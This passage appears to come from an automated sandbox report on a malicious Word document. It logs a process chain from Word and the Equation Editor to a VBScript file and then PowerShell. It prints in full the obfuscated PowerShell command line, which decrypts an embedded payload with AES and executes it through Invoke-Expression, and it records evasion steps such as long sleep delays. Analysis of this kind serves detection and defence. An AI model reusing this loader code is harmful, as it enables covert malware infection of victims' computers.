    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1519Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8323Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 936Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2188Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep time: -9223372036854770s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep time: -1200000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2160, type: MEMORYSTR
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni87355924191917571657221755980918cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = '+'cniowxrowtig5switg7zfd9oyi4qwnw2dsa+q1jveygii0r57qf0caj6ce9ujcue17thtaaiql4mofqp8uqjn3viikukad9gjb73ylemkpbpyycaeu88vsgvza+wmnqqkojtucgsrahp+xfvolxiwkzrec6cdmhgqtbr7ul9x0coyu8fzvclezpcj9sc07ffdrohhuhbsqkccmgvkwzbfde4wi4qsxfr0cioaxw4x1d9oiazdvrlq7tvm7fwsdwkap1gku8ftkup76e06s7qo9memw3tq8quv7o4vz2irxs0ziv2zz43kztqlvpwu56krcwfhzt5wsmdlm6y/kjkaexzm4pluf7yebu0a9z1fi7c07qhaf50prc4b0p4vexv0bzhildo0tp8cckt4gwieeq3gfv2zur7rf0fu7hcrfcz3hfoxlelocy+jfmy8qqsqjd/xosq7loo1qttphgyqfwgzs1pb46tc9lri4voxvswx/gyt8ubh3smlcmjhqtdxw1skyoifbmmuyt6bekgthwo9bt9lstdzfjjap8pyu0ay5hre2jyplqwpugsonpjx2jpl/sc0h2tsg6gjn/cwa7+ltvkfzoynfx30kb9kkg120+unfkms3v8wisgryud+sxqwjcaoypvzwfy584bmta/hr64hnprrwpzoyj9tujt8uvo3tt9ewx1m9yksk8ytrjef02eowbw4wnumrgktnjffyymlsg2nnu1oxxqkoitig2lwgdnoejetoyem7c6a+wupv6mak+vas/xj/i0r6oik7upq6akeyei5dzzuzjjqccizdkfko6mbk4nidu0tenks2a67lz5fuj4pbw/s3wri//butcidgnv8v1qva1jgf41+wksq3kq4+9xtf4drv8toy/yzmuobgdp2ur+y3a2fqqh6nsjon1lo8srnwtjakyukfztnqcwdrqbh3gxlyxp4rqrjf639ikh0a6doidvbjfbrhrk3hkiv1d5dfx68wt1a2vfcyrrj6xvcgm6v6abmhoklbz+irrubegx7pm2fetr5camo9rgs2qwm0echifgb0yk+d7u3tksnz7mguquwdjgkv9b7rpt9c1lk0n1syoy8kxih4yniwpwrtz+l3+pjcwwt0polu/zov3dlsfamsjg+fubduuw6cb+/nfd6ny0tsrkis8ix3ddtansmncnbv4w+qkuagnu/k/ooziqqfamfxwerdymw9x5gz5l/oms8qnelxh1mjfegt8bddzfgl40osweew0um1i4dzqqezfqvqujd7vet4pm7lasim+cnryw2wavlcpcorugd9ti6vwdes0wp/cxdn70muygszqxqn+lyilh1wvofatte8/dmgxr5edat/cxjndrufdr9nawvkhhoi/iyjbgfepqik9qjzhhmsr22avo600gw==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crep
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni87355924191917571657221755980918cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = 